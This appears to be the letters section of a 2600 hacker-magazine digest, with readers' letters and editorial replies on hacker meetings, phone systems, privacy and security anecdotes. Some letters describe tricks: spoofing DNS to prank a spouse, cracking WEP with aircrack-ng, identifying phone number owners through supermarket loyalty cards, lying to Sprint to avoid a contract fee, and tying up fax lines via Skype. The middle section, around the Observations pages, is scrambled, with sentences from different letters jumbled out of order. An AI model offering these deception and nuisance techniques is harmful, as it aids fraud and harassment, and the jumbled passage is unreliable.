It then occurred to me: what if she punched me in the face, took my laptop, and hit those sites? Or what if she gets on her iPhone to check the sites? Our AT&T reception is horrible at home so she jumps on out wi-fi. So I enabled “named” on her Mac and make sure our DHCP server handed out the DNS as her Mac. And I made sure that infowars and prisonplanet resolved to her Mac via some A record additions. She got home, jumped on her Mac, and as she browsed those sites and said “Oh my God, see, the government hacked them!” I left the room, went outside, and laughed hysterically. My advice to anyone wanting to do this: 1. Leave the room before your loved ones open the browser. 2. Put some duct tape over your mouth because my laugh was a dead giveaway. Curious why in Ethernium57’s article “Hacking: An Astronomer’s Perspective,” that while the entire article was awesome, the end was so abrupt and spoke about nonsense FaceBook garbage? I was waiting for what ended up being a wtf! I’m going to pull out my old Celestron and duct tape some lenses together now. Did you guys cover up his article in some way? Perhaps it’s the secret base the elite will hide in during the 2012 planetwide catastrophe? aurfalien Dear 2600: In the future could you put up some more shirt designs that are more... subtle, like the seal one? Frankly, most of the designs are really not my style; they’re too noisy. S Your vote for more subtle designs has been received. We’re open to more suggestions as well. There are rumors of a new shirt in the works. Dear 2600: I wanted to respond to the response from Sigma’s article (“Exploiting Price-Matching through Javascript Injection.”) Some deemed it unwise to print an article that gave explicit instructions on how to exploit a retailer and basically steal money out of its employees’ pockets. I would say that as an employee at Best Buy, I was very grateful for that article. I was able to recreate Sigma’s method and bring it to my manager’s attention, thus allowing our business to be more aware of the possible exploitation of our policies. Now, aside from the pat on the back I got for bringing this to the company’s attention (thanks Sigma), I am grateful for the articles being published because part of hacking is finding these sources of exploitation, even if it means using some underhanded methods. It is really the only way to find out that there’s a problem and make sure that it doesn’t happen in the future. I’m even grateful that it was tested live in a store because that points out to the company that the management has grown lax in their overriding of price matches. This was not a complex method of theft; I could have done it when I was 12. But without having read that article, I wouldn’t have thought of it. Thanks for the heads up, Sigma. Clay Dear 2600: This is my response to the rebuttal Michael gave to my article on “Social Engineering to Circumvent the Stock Market.” I’m sorry if I didn’t explain who or what I am. I assumed that was a given. But I believe you missed the point of 2600 Magazine and maybe the true meaning of hacking altogether. Maybe you took the legal disclaimer for granted. (I’ll give you that one.) But I am not a thief, I’m a hacker. Telling a shopkeeper the lock on his door is broken is not a crime, nor ethically wrong. It is the thief who doesn’t tell the shopkeeper their lock is broken who usually comes back and robs the place blind. You might question why I chose to have this published in a hacking magazine versus just, say, calling Wall Street or the oil companies myself. That is because those kinds of calls usually fall on deaf ears. (Thus, “gray hat hacking” was born.) Meanwhile, the system is flawed and open to attack. It is only a matter of time before someone comes along who doesn’t tell the shopkeeper the lock is broken. If people do not know an attack is coming, they are a victim. But if they were warned an attack is coming that could’ve been prevented and they do nothing about it to fix it, they’re just stupid. I believe we should educate the public and at least give them a chance. I did find it humorous that you really think that the oil market jumping so high in 2008 was all due to demand. True, there are now more people driving in China, but the Soviet Union’s devolution opened up a vast supply of oil which, according to rules of supply and demand, should have dropped the price by flooding the market. But it never did, even before China accepted state capitalism where their driving community took off. Even now, if you keep up on the news, the big oil companies have shut down more and more supply lines of oil for no other reason than the price has dropped. Even at $3.50 a gallon, they admittedly started doing this to try and drive it back up. You said I should have researched this more. I now challenge you to do the same. If the projects you’re referring to in Alberta, Canada are what I think they are, I really don’t care. I assume you’re talking about that project to force underground compression to create oil that would normally take Mother Nature lifetimes. It was only viable if oil prices were high, otherwise production would not meet demand. I really don’t care if your country or my country or whoever becomes the next oil kingpins. There are solutions out there for us to use alternative energy in vehicles that are not only cheaper and cleaner, but faster and better built. I suggest you watch the movie Who Killed The Electric Car? Oh yeah, read the real definition of a “hacker” and “cracker” sometime and stop demonizing people you do not understand.

248

THE HACKER DIGEST - VOLUME 26
P.S. 2600, I love you guys but you got to learn to spell my name right. It’s Israel, not Isreal. Israel Your name was spelled that way because that’s how you spelled it in your initial article submission. Until you told us otherwise, we had to assume that was how you wanted it spelled and so any reference to your article by other letter writers had the proper spelling “corrected” to the one you gave us. Not a whole lot we could do about that. Dear 2600: Michael asked what the acronym HTH stood for and it was (most likely) incorrectly answered with “helix-turn-helix.” I believe HTH in that context (signed at the end of a message) almost certainly stood for “Happy To Help” or “Hope This Helps.” The acronym HTH being used for this meaning has become a common occurrence on the large SomethingAwful forums, which is probably where the message writer got it from. HTH Ryau It’s amazing how we somehow managed to miss that, even while signing our own response to the question of what HTH meant with “hope this helps.” It just goes to show that our readers don’t ever miss a trick. Mostly. Dear 2600: I cannot thank you enough, KES, for your article “Simple how-to on Wireless and Windows Cracking.” Your guide was so easy to follow that I was able to crack a WEP key the very first time I tried with no problems. The only thing I did differently was install the Aircrack-ng suite on my laptop already running Ubuntu 9.04 instead of using the BackTrack distro. I have always wanted to try this but was never really successful. I did notice one small error. In the command where you run airodump-ng, it says “-bssid” but that gave me an error and told me to use “--bssid” instead. After I changed it, it worked like a champ. You also opened my eyes about how insecure WEP really is, so I’m changing my own router to WPA. Thanks again for making this so easy. Happy Hacking! Justin Dear 2600: I subscribe and I just read the privacy article by 6-Pack. Fantastic and very helpful. How do I send him or her a snail mail letter? If I send it to you with extra postage, can you forward it? I would never ask you to give out an address, so I must ask your help on this matter. I have a few other questions and I would like to send this person a free copy of a book I wrote. It is the reason why this article is so important to me. My book is titled: James Earl Ray - The Last Days of Inmate # 65477 and I receive death threats every now and then and I have a persistent stalker as well. I would like to send you a copy too. Do I use the Middle Island, NY address on the back of your cover?
Michael Gabriel You can send us anything at our address. If the writer requests us to forward something reasonable, we will do that as well. Dear 2600: To 6-Pack: You don’t have to apologize for using the street address of the post office. There is a provision in the U.S. Post Office DMM (Domestic Mail Manual) which provides that one can use a street address plus a box address and that the mail is to be delivered to the address that is immediately above the city and the state. The DMM provision does not prohibit the use of the street address of the post office; it is like any other street address! Therefore, one can legally and properly use the street address of the post office, then the box number you are using, and then the city/state. The DMM is online and you can look up the exact provision for dual address delivery. Further, even if the address is wrong, if the post office employee knows the correct address for delivery, that employee must deliver it to the recipient - regardless of a wrong address on the mail! The post office must deliver the mail to the box number regardless of whatever street address is indicated above the box number. In fact, one could probably use a phony street address and then a legitimate box number and the mail must be delivered to the box number. Those recording addresses will then pick up the phony street address, hopefully! Also of interest, temporary forwarding addresses are not available to marketing companies, only permanent changes of address with the post office. Therefore, one is wise if moving and not wanting the new address to be part of the public record, they put in a “temporary” address for 11 months. Then, after the 11 months, one can then submit another “temporary” address for another 11 months. It works well. Enjoyed your article - well done and thought out. I have been protecting my privacy for years! Always pay your cable, telephone bill, electric, water, etc. with a money order. These companies record the source of your payments. They have your checking account number, bank, etc. Therefore, pay them with a non-traceable payment. Don’t ever use your credit card, don’t ever use a credit card, don’t ever allow “automatic pay” since it is not only recorded, but hard to contest later. Pay in advance if you must, but be careful how and in what manner you pay these utilities. Your privacy is at stake! Fiducia Let’s see how many people can send us a secret message in the line before our PO box or simply enter a really funny street address that will never get used. Of course, just because something is supposed to work in a certain way in the post office is no guarantee that it will. But just for the fun

Dear 2600: There used to be a group that met in Birmingham, Alabama, but I have not been able to track them down. Has that group stopped meeting or just changed locations? Is there someone I could contact here in Birmingham for more info? I work for Black & White (www.bwcitypaper. com). It’s an alt-weekly arts/entertainment paper. I’m interested in writing about the group, if it still meets. Michael Craft We don’t give out contact info for meetings for privacy reasons and also because there is no one person or group that “runs” them. They are gatherings of all sorts of people who follow our basic guidelines and hopefully interact with one another. As we no longer have meetings in your city, we can’t point you to a website or forum where you might be able to speak with someone. However, your letter may inspire someone to try and get something restarted there. Dear 2600: My first 2600 meeting was a few years ago. It was also my most recent meeting. For the few years that I have read 2600 (I’ve known about it since the BBS days but only recently had access to the print), the meeting pages have stated that the Calgary 2600 meeting is located at the “bland yellow wall” in the Eau Claire market. This was formally known as the “milk wall” due to advertisements painted on the wall depicting cows wanting you to drink more milk! Now the wall is hidden behind a children’s playground inside the Eau Claire building and, yes, it’s still bland yellow. It is in my opinion that this is no longer a suitable place for the meeting due to the lack of seating and general confusion of what the heck the bland yellow wall is for newcomers. I suggest that Calgary hackers in the future meet in the wifi “hotspot” of the Eau Claire market. It’s a sizable space, well advertised, and due to its nature makes more sense for the Calgary hacker community to meet there. Please publish my letter or at least change the meeting arrangements in the meetings section to the above location. The newsstand that I got my copy of the last issue at had at least 20 copies available. According to the guy at the till, people were asking when it would come out a week before the shelf date. Calgary has 2600 readers (wouldn’t it be awesome if that was literal?) but are confused as to where the meeting is. I am the proud owner of The Best Of 2600 and listen to Off The Hook and Off The Wall from my media device as often as the episodes are available. May hackers take over all abandoned

Meeting Stuff

nuclear silos! They’ll be in much better use than run down bunkers! patgroove We have made the suggested change on the condition that every new attendee be told the story of the “milk wall” so that its history may live. Dear 2600: I am from Vienna, Austria, and for approximately one year I’ve bought your quarterly. After reading some articles and announcements, I was overwhelmed and found myself with the exact feeling I had when I was younger: an exploring, investigating, cryptic, underground feeling and passion. Thank you very much for your magazine! And thanks for your website! I started listening to your first radio session but my iPhone could not download it all (as it downloads only in temporarily memory, but is never able to save downloads on the phone itself). If I have time, I’ll download them all onto hard disk. Many years back, I bought some hacker and underground books and packages along with some magazines, but I never had time because of working 10 to 12 hours every day for 13 years! This means I am not as much of a hacker as I’ve always wanted to be. But I do theoretically know what is possible, especially since I’ve spent those 13 years working in IT and telecommunications. Besides this, I’m a member of Linux Firststeps here in Vienna and have contacts with members of quintessenz.org (who organize the annual Big Brother Awards and have podium discussions about data security). In Vienna (according to your meeting listing), we do not have any public hacker meeting. I’m very interested in organizing one. But you have to know that people here in Vienna do represent their own opinion very strictly or rudely which might lead to negative impacts to the discussion partner (me), even later on, e.g. if he/she thinks totally differently as he/she belongs to the “good” side or claims against you in court, even if I only tell theoretically the “bad abilities” of hackers that I know (as practically I don’t know how to do any real hacker stuff). I want to create an easy, cool, relaxed, and open minded group in which you don’t have to think about what you are allowed to say or not. But you never know the group members, especially new ones, and what they may do afterwards in the meaning of the law. So my question to you is if you have some experiences with such problems. What should I do or how should I behave in such situations? How I can prevent this in advance? My intention first is not to meet personally in a public place, but rather offer an anonymous email, where communication is started first. If I trust somebody, then we can meet on our agreed time and date. This is also never a guarantee not to meet an “enemy,” “spy,” or “intruder” from the “good,” not underground-thinking side. Furthermore, I don’t have time now to meet in person

250

THE HACKER DIGEST - VOLUME 26
and later to hold on at exactly the same day of the month. If I have the chance, I go abroad for work. What do you think about this and what is your proposal? Thank you very much in advance! May I also ask, please, what does “2600” means? Is it a code for a modem connection or dial secret? Richard What you are describing is not a 2600 meeting by any stretch of the imagination. You seem more interested in meeting fellow cloak-and-dagger subversives while maintaining a busy schedule. That’s all fine and good but it’s not the way our meetings run. It’s completely unacceptable to either meet in a non-public place or to subject someone to an “approval” process. Our meetings are open to all and must be in an easily accessible location. We’re not trying to hide, nor do we believe that anything we’re doing is illegal. That’s not to say that law enforcement won’t take an interest or even that some criminals won’t show up, thinking the meetings are something they’re not. This is why we need calm, level-headed people attending who understand what we’re all about and what we’re not about. Vienna is a very open and accepting place for the most part. We believe a meeting of this sort would do well there. There will always be people who don’t completely agree with certain premises or who are, as you say, strict and rude. We still think the overall atmosphere created at the meetings will be a great benefit in establishing a dialogue and helping a community thrive. As for what “2600” means, this is the question we’re asked more than any other. It’s a reference to 2600 hertz, a frequency that was once used by phone phreaks to seize control of long distance phone lines and gain the ability to route oneself all over the world. Symbolically, we saw it as an expression of independence and rebellion. The rest is history. Dear 2600: What happened to all the 10-10-XXX long distance prefixes? It seemed at one point, about ten years ago, you couldn’t go a minute without seeing or hearing an annoying ad for one. It seems like they all of a sudden disappeared. Now I don’t know what to do with all those promotional refrigerator magnets.... Mark C. They do still work but with all of the other means of communicating that are available these days, the seven digit Carrier Access Codes (CACs) don’t get nearly as much attention. Incidentally, the 10-10-XXX format is really a 101XXXX format. Leading zeroes were a part of the newer four digit codes (known as Carrier Identification Codes or CICs) that replaced the old three digit codes (10XXX). So AT&T under the old system was reached by dialing 10288 and now it’s reached by dialing 1010288. It’s hard to imagine the need for 10,000 of these codes throughout the country or that the old limit of 1000 was ever reached. But apparently every small and obscure company in any part of the country was assigned a code and they rapidly filled up, even though the extra digits seemed to serve very little purpose to customers. Perhaps our readers can share some stories on some of the more unique carriers that must be out there somewhere. Also, the question nobody seems to ask is why was it necessary to add the second “one” in the dialing code? 101-XXXX would seemingly work just as well with 10-XXXX since we have yet to find any use of 102, 103, 104, etc. as prefixes. Perhaps they’re actually planning in advance for that dark day when there will be a need for 100,000 different carrier codes. Obviously, it’s a rather silly system that few people even use anymore and that only makes the entire method of dialing a whole lot more cumbersome than it needs to be. Add to that the disaster of area code splits that wound up destroying the geographic representation of phone numbers, and one has to wonder if we should consider just starting over and doing it all properly. Dear 2600: Any preferred format for articles (is ODF OK)? ternarybit We prefer ASCII but can read most anything. If it takes longer than a few minutes for us to decipher your format or if it looks completely messed up in the end, we tend to get impatient and move on to the next submission. That’s why we suggest ASCII, which is about as simple as it gets. Dear 2600: Can you send subscriptions to Havana, Cuba? If so, how? If not, why? Jane Doe While the various authorities make it as difficult as possible and the odds are higher than normal that our magazine will never arrive, we do honor all subscriptions to Cuba just as we would anywhere else. It can be a trying experience since it’s not exactly easy for someone to even let us know that they didn’t receive their issue. It doesn’t mean we shouldn’t all be trying to get around whatever restrictions exist. Dear 2600: I was reading your latest issue and there was a letter regarding HTH. You talked about several different possible (but not probable) signatures and ended your response with a “Hope this helps.” You did that on purpose, right? I mean, it should only be logical to me that someone whom another person refers to as “very good at writing code” be helping said person and thus use the “hope this helps” as a signature. Or I could just be crazy. Either way I would also like to know if you could recommend a hacker mentor that I could possibly learn from in Colorado. Thanks for everything. 7shots

Inquiries

251

THE HACKER DIGEST - VOLUME 26
The period for commenting on the whole HTH thing has expired. As for a “mentor,” this is not how you become a hacker. You have to go out and learn, read, experiment on your own. We’re not saying other people won’t be a big influence. But to have one person try and mold you into something isn’t the way to become an inquisitive and creative individual, which is what a hacker ultimately is. It may seem as if there is no inspiration around you, but that should make you even better at finding alternative ways of thinking and accomplishing things. Some of the best hackers come from the middle of nowhere. Dear 2600: I have a straightforward question and keep in mind I am no computer whiz. I have been cut off of the network at work. In other words, I have no Internet access. It is my fault and so I’m not trying to get at anyone. I’m too old for that. But is the termination done at the server or my computer or both? OK, thanks 2600 and I appreciate all the great writers you have and their articles. Keep up the good work! John Badlands of West Texas There are any number of ways you could be cut off, from physically unplugging your connection to disallowing your particular machine in a local switch or router to filtering all of your Internet traffic through software. The best way to determine what’s happening to you is to see what the response is when you try to connect to something. If there’s a lot of shouting and people start running towards you, then you can assume that your outbound traffic is being carefully scrutinized somewhere and that your actions are really being watched. If you can’t connect to the company’s internal network, your machine has been completely isolated. If you can connect to 2600. com but not to cnn.com, then your company is using blocking software (obviously misconfigured in this example) and it’s either being applied just to your machine, or possibly to everyone. If you run a “traceroute” from your local machine to a remote one at your command prompt (“tracert” in Windows), you should be able to see at what point you’re being terminated. Dear 2600: I bought a payphone on eBay for cheap to use in my living room. I get many compliments from friends and visitors whenever they visit my house. They have never seen a payphone inside a house! My only problem is that I always have to deposit 35 cents whenever I want to make a call. I can receive calls just fine, but when I try to dial, it charges me. Does anyone at 2600 know how I can program my payphone to make calls without inserting money? It would mean the world to me. Manny Clearly you didn’t buy a genuine Bell payphone of old that was once the only kind in existence, since those can be hooked up just fine in your home without ever asking for money. The reason for that is because all payphones used to have a different kind of line category assigned to them. This is why it was always such fun to hack into the phone company computer and switch someone’s class of service to that of a payphone. They would then be asked for money every time they made a phone call, even though they weren’t even using a payphone. But we digress. You have what is known as a “smart” payphone, where all of the technology is contained in the phone itself. You’d need to look up documentation on the specific model you have to see how you can disable the demands for cash. We hope you at least have the key to your phone so you can reclaim the money you’re inserting. Dear 2600: I discovered a phone phreak method for jail phones when I was arrested back in 1999 for BASE jumping. It’s fairly simple. How do I submit an article? BASE 460 You can send articles to articles@2600.com (we assume you’ve served your time and have net access) or by writing to 2600 Articles, PO Box 99, Middle Island, NY 11953. You do realize that ten years have gone by and it’s quite likely there have been some changes, even to a decrepit prison phone system? Either way, we’d like to read what you have. Dear 2600: What is the significance of the number 2600? Doug It’s the name of our magazine. Next? Dear 2600: I’m sure this has been asked, and you’ve likely answered - but what the hell... I’ll ask again. Have you given any thought to digital distribution for the quarterly zine? I tried Amazon’s Kindle application for the iPhone/iPod and I was very impressed. I thought the small screen size would be an annoyance, but it’s actually very convenient. I’d be willing to pay a price comparable to your regular issue price or subscription price. 2600 would probably have an advantage and ability to charge more than heavily circulated magazines are currently charging through devices like Kindle; the format would allow for a reader to have many back issues of 2600 at their disposal as a reference. I’m sure it would allow some readers to avoid the retail hassles (can’t find it on the magazine rack) and help you prevent the printing and distribution headaches you inform us of from time to time. I do see that The Best of 2600: A Hacker Odyssey is available in the Kindle store. Good move. The hardcopy edition is pretty damn thick! For readers with a Kindle, iPhone, or iPod touch with the free Kindle reader app installed that haven’t picked up a copy, I’d recommend giving it a try in the digital format - it’s convenient and you save a few bucks at the same time. sonnik

252

A simple trick. I have a few questions about this. Figure around 20 pounds. As for sizes. We do make exceptions if the order is bigger than normal. The cashiers often bulge their eyes with surprise and I laugh even harder. Approximately how big will the package containing the back issues be (and how heavy)? Also. but a cashier told me they weren’t allowed). Though I would imagine that upon entering multiple times. That would be a dickish move. the chances are high that almost every person will have a card in at least one supermarket. The only way around this vulnerability is to insist that the customer have their actual card or club number. Two G**gle related experiences I’ve had this year related to security and privacy: 1) Earlier this year I worked with someone who did a “Tech Talk” at the G**gleplex in Manhattan. and after getting into an elevator and getting off at the appropriate floor.VOLUME 26
We’re looking into this and so far Amazon has been the only obstacle to our moving ahead. We don’t send two of the same. your name appears on the receipt. I buy every issue of 2600 (instead of subscribing) as I believe that it is equally important to see the magazine displayed on magazine shelves! It is important that the general public gets a chance to discover your magazine while browsing newsstands or bookstores. everything is there. If not. and I could enter through their see-through locked doors beyond the “lobby” because employees coming out would just hold the door open for me. Guillaume Generally. Almost everyone has to shop and. After the building’s entrance. It’s very lax. etc. is it possible to get the back issues delivered to a different address than the subscription? I would prefer to get the back issues at work so I won’t have to pick them up from the post office but would want the magazine delivered to my home address the rest of the time. sure.. 2) I recently went through Gmail’s process of creating a new email account. Thanks in advance. cafeterias. which is why I buy it and contribute to its demand in stores. which the supermarkets will never do because of inconvenience. I consider myself a modern hacker. “Thank you for shopping at Safeway. Wendell We generally send lifers the two most recent t-shirts. I have a few experiences to share. We hope to be able to report some progress in the near future. Brown Dear 2600: From New York City with love. I even go to the extent of buying from different places. Mr. I have been using a Chinese friend’s phone number because I think it is funny when the cashier says. I live in Santa Monica (California) and the owner of the newsstand on the “promenade” (very high traffic) tried several times to contact you in order to get your mag on his shelves. we use distributors to send to individual stores so we don’t get overwhelmed. I explored a little more and found “One
Observations
253
. is there someone with the sizes and measurements? I don’t want to say my normal size and find out you guys make them to different measurements. I hack information to keep others and myself honest and fulfill my goals. library. Your other ques-
tions need to be answered through our order department (orders@2600. This was not the case when I first signed up (when it debuted). What two shirts are they? Are they the same? Also. It says it also comes with two shirts and a hat. there is a checkpoint with two security personnel at a desk. Dear 2600: I’ve been a long time reader of 2600 and enjoy it greatly. Obviously. Thanks for helping to support us. We can definitely pursue this if he’s still interested. this is a very simple method for finding out the name of whoever owns a certain phone number (if they have a Safeway card connected to it). Dear 2600: At my local Safeway. Wong. and they are now asking for mobile numbers. the employee workstations.631. Although not an engineer or programmer. you are allowed to type in your phone number if you forget your “Safeway Club Card.751. Barrett D. For years.THE HACKER DIGEST . No one greeted me.com) or by calling +1. This is likely what we told him if he inquired about this. or to give each cashier an anonymous “guest” club card to use in these cases (I’m not sure why they don’t do this. one would not be met with the same circumstances. you can always try any other major supermarket. you can call our office and see if someone can read you the specifics off the label but generally our sizes are pretty standard for American shirts. I missed it. My ID was not checked after telling them I was there to meet so-and-so. It would be a bummer if everyone subscribed and no one bought from stores! What do you think? FYI. lego faces of the CEOs. but it goes farther than that. If this has already been pointed out by someone in 2600.” when I am so obviously African-American. Once you get past this. The package will likely be two packages and they are definitely carryable but not all that light. because these cards give the user discounts. Dear 2600: I was looking at the store and noticed I could buy the complete set of back issues and a lifetime subscription in the same lot.” When you do this (if you have a Safeway Club Card).. the elevator was distant from the welcome desk (about 30 feet?).2600.

constantly. they’re methods of protecting the entire Internet from receiving spam from their users. blackoperations Whatever gets you through the day. maybe coincidence or maybe the machine was messed up. it could be on the same shelf as Blade Runner (1982). Reader in Brooklyn. I wondered how many megs it would take up on a hard disk.” It seems like this might have more to do with halting people from having an excess number of accounts. They then insisted that there were not any and that his best bet was to switch services. There is one checkpoint there that is similar to an airport. And last. Crazy but true. Does this mean something or is it just a coincidence that its ID in Gutenberg’s systems is 2600? http://www. after page 18. Well. I went back to the store to exchange it. For 2600 readers not aware of it. New York. Dear 2600: I like to call fax machines with Skype. Their policy holds
publishers responsible for any issues that aren’t accounted for in their stores. despite the lady trying at least ten times. but all the magazines on the shelf were the same way. I don’t know if this applies to all the magazines distributed or not. is it really such a big deal that you were able to get into a building or even an office without draconian security checks? Have we programmed ourselves so thoroughly that we think something is amiss when we’re not overly scrutinized? Walking into an office building used to be a fairly trivial event. Florida. and at the register it wouldn’t scan. send us a copy of the defective issue. Nunook We would have gotten stiffed had this happened in a Barnes and Noble. It causes the machine to ring and make noises at the other end. but since their policy says no food allowed inside. At the time. Pages 1 through 10 were missing as well as the last ten pages. Also.VOLUME 26
of the reasons we’re offering this new way to sign up for Gmail is to help protect our users and combat abuse. Rob This kind of thing happens every now and then. Dear 2600: I recently saw a movie from 1983 called Brainstorm with Christopher Walken. if possible. you can cause untold amounts of noise for the receiver. they canceled the contract for free and told me what service provider would
254
. it might be of interest. I just picked up my winter issue. and a banana inside of it. papers.gutenberg.THE HACKER DIGEST . we’re in pretty good company. Just hoping you guys don’t get stiffed.org/etext/2600 Ankylosaurus Either way. Dear 2600: I bought a copy of the latest 2600 Magazine and the pages started on page 11 then. I think it was ahead of its time. She ended up just putting it down as some generic periodical. pants. This is probably a good thing. they can limit the number of accounts that are created for each phone number. It was a Borders over in Jensen Beach. and WarGames (1983). and not one of them could tell me any reason why this was the policy. So. reconfigure Regarding your first story. I’m not sure how giving away one’s mobile phone number “protects” users. Dear 2600: Continuing the conversation and in response to dmchale. On top of that. I had a multi-tool in there with a flat foldable blade that also has a screwdriver and bottle opener. In some ways. So they pulled them all off. they would not let me through with the evil banana. For that time period. This helps greatly in keeping future imperfections to a minimum. There’s no reason why it can’t be again. By forcing people to receive and respond to a message on their mobile phone. But these aren’t methods of protecting their users from receiving spam. but I remember there being a problem with the bookstores not selling 2600 correctly and you guys not getting credit for it. but the same thing happened for my hakin9 magazine. where there is no Sprint service. Videodrome (1983). NY Dear 2600: A friend and I were discussing War and Peace. Then. The blade went undetected. lol.S. Google claims they’re protecting users from receiving spam by limiting the number of accounts that can be created on their service. I did some research to see how I could social engineer a way around the canceling-contract fee. If you see an example of this. Dear 2600: Sorry if I’m sending this to the wrong email. All they said was that they follow orders! They couldn’t even tell me if it was for the simple reason of lessening garbage. I came across a way to do it. all I had to do was go into Sprint and tell them that my boss was moving to one of those areas and I needed to find a store around the area. I had a wallet with a small zipper pouch. using Skype’s dial pad. In addition. All that you need to know is service areas. an experience I had entering the building that houses the Department of Labor in Brooklyn. though. they obviously make it more difficult to create a whole bunch of accounts quickly. I recently had to cancel a cell phone plan for my boss so he could switch from Sprint to AT&T. like a good employee. let us know exactly where you saw it and. I asked three different officers standing around about the no food policy. I needed to find an area in the U. After a little more manipulation/playing dumb. it started on page 11 again. I was hoping you might be able to send me the missing pages in an email or post them on the web. I had a backpack on with a shirt. so I did a quick search for it.

” The important thing is that none of us anger her because we really don’t know what she’s capable of. there was no way they could send me a statement. Dear 2600: For reasons that still escape me. one current and one long since expired. The operator asked me for my bank routing and account numbers.VOLUME 26
best suit him. I didn’t recognize the number. another call came in and I answered it. Dear 2600: My cell phone rang but I was busy and let it go to voice mail. Who’s to say a super celebrity can’t also have this ability? Perhaps she will accept our invitation to speak at The Next HOPE on her methods. I had already given my account information. In addition. trees. and Social Security number to someone who could be just masquerading as being from Citibank. Calling back. checked my credit cards. but we live in desperate times. there was an article about Kim Kardashian that was pointed out to me. The Webist Switching to paperless billing saves the credit card companies a fortune but it often provides a real disservice to the consumer who can easily miss bills and be tricked into paying late fees. In the future. Or maybe you’ll read about them in a future “Hacker Perspective. The operator I had previously spoken with only looked at my personal cards. Dear 2600: Would love to get a 2600 subscription on
Requests
255
. and assured me that both were current and had a zero balance. TheC0A7S Another method that has been known to work is to enlist in the military and be sent somewhere far away where your cell phone won’t work. In the November 2009 issue. That will save postage. She didn’t know. It’s a bit of an extreme way of getting out of a cell phone contract. And tricking customers into not getting a paper bill is a sure way of making paperless bills unappealing. It took three more calls and over two hours to finally settle the problem. I kept pressing zero until I was connected to an operator. but dialed it anyway since I’m a business owner and it might be a customer. and aggravation. Ferris Super hackers reside in the most unusual places. The only hacking I thought she did was her acting. The automated response on the line identified the number as Citibank. address. I dial a known number before releasing info by phone. At this point I balked and realized that I didn’t really know who I was speaking to. In other words. By then my meatloaf was overcooked and I was absolutely frustrated. I offered to pay off the balance. Anyway. many companies don’t store past bills for very long. Again I was busy and no message was left. No message left. We spoke and I asked what the reason for the call was. secret password. is not free. there was a section called “935 Things You Didn’t Know About Kim . but finally gave up and gave me a case number. I asked about my previous call and the operator could see a record of it. I fully realized the separation between the personal and business card sides at Citibank. Thinking something was amiss. I never knew she was so 31337. I stopped short and told the operator that I would call back to the number printed on the back of my Citicard. We suggest a compromise for all of those credit card companies who care so much about the environment. The reason being is AT&T (like other companies) loses money from people in those areas because they have to use other service providers’ towers which. I asked why I hadn’t received a statement from Citi and the operator replied that I had been switched to paperless billing.THE HACKER DIGEST . Three more calls came in from the same number later that day. and in it there was something that might be of interest to the hacker community. my girlfriend reads Cosmopolitan. Turns out that the business card side of Citibank doesn’t talk to the personal card side. I got to thinking that phishing by phone is more than probable. Later that evening. A recorded message said that I had a balance on my business card and that it was past due with penalty charges. Just send us the bill without all the junk and special offers you cram into the envelope.” Number One reads as follows: “She claims to be an amateur hacker who can break into anyone’s voice mail or email.Until Now. and tell them they have X amount of days to find a new provider and let them know what the major local provider is. never clicking on links from banking emails. She pressed for bank info. all of which were from a supplier that I use.” Wow. I am security conscious. Michael J. which can be extremely inconvenient for someone who needs to look something up. I asked what email address they sent the statement to and she replied that that field was blank. hope this helps someone in need. in a money hungry society. but still gave my info readily to someone on the phone. I hit zero to speak with an operator. Being responsible. I closed that account since I didn’t want to deal with a company that switches you to paperless billing without a way to get you the statement. The operator confirmed that I had a balance and listed off the charges. Side note: I know an office employee for AT&T and her job is to call customers who live in areas where they are constantly roaming. of course. On page 44.

If people want to believe someone is after them. I would have to assume the original author didn’t mean what he wrote.. 2600 should not have conceded the point as quickly as it did: “And yes. Thus. Do you know of anyone who can help? Is there a way I can contact you? I am writing you from a Kinko’s in Los Angeles. ‘of those people.” so “people” is not separate at all (as Granny believed).’ and does not relate to the verb.” if a bit disjointed. but I don’t have the context for the sentence fragment. That is. With the singular “reads. don’t fixate on this because that’s the surest way to have someone completely destroy you.” as it refers to people who have blue hair. Lyle One would think. because “who read” could no longer be modifying that noun. as Granny suggested. even out of context: “There are many people who read 2600. Are you one of them?” The sentence fragment could be rewritten as so. If. they will. you are completely right on the grammar.’ The subject of the sentence is ‘one’ and that means the verb (read) should be singular (reads). Your lights flickering or your phone buzzing or just your “knowing” that someone is up to something isn’t going to work on anyone who doesn’t share a psychic link with you.. you might want to consider the possibility that you’re wrong. Investigators have given up and I am not.” the sentence would require “those people” to have an antecedent. It’s very easy to make people believe that someone is capable of tapping any phone or reading any email. It is possible that this antecedent exists. being from the Summer 2008 issue. In nearly half of those cases. All that’s required is a bit of fear and little to no understanding of how the technology works.THE HACKER DIGEST .” a plural noun. But in the vast majority of cases. where you [2600] write.VOLUME 26
my Amazon Kindle. He has cost me thousands of dollars and made my life hell for ten months. what was written remains grammatical. So the best thing to do is remain calm and wait for solid evidence. it should have 2 l’s. We can’t tell you the number of times someone has suspected us of being up to something.. without any significant changes in grammatical structure: “You are one [person] of the [many] people who read 2600. and then I added a few implied words in brackets. ‘Are you one of those people who read 2600..” All I did was change wording from that of a question to that of a statement. Would think it would be doable since the book is available there. Are you one who reads 2600?” These two sentences are grammatically “correct. the construction of the latter sentence is pretty archaic. “people” can indeed be dealt with independent of “reads. And just when we thought we had dodged a bullet on that one.” not just the solitary noun “people. simply because their phone rang after they called us or they got a piece of spam right after sending us an email. As you can see. regardless of what the person is actually doing. Even then. But if you’re not able to get satisfaction anywhere. Granny fails to parse the text she is “correcting. Even if there were such a thing as “correct grammar. Are you one (of those people) who reads 2600?” In this fictional case. it’s not even that.” The big mistake Granny makes is failing to identify that a dependent (noun) clause is the object of the preposition “of.
Grammar and Spelling
256
. for instance: “Some people have blue hair. Dear 2600: I need help catching a hacker that seems to be able to fool everyone. Dear 2600: As a long time reader but first time letterwriter. the fiction can be rewritten without the prepositional phrase: “Some people have blue hair. “read” were instead “reads. her (or his) analysis of the grammar of the sentence fragment in question is unreasonable.” the original writing would be perfectly fine. To believe that. Note that there are plenty of bad investigators out there. of course. We’re still working on Amazon. and is an expert in telephony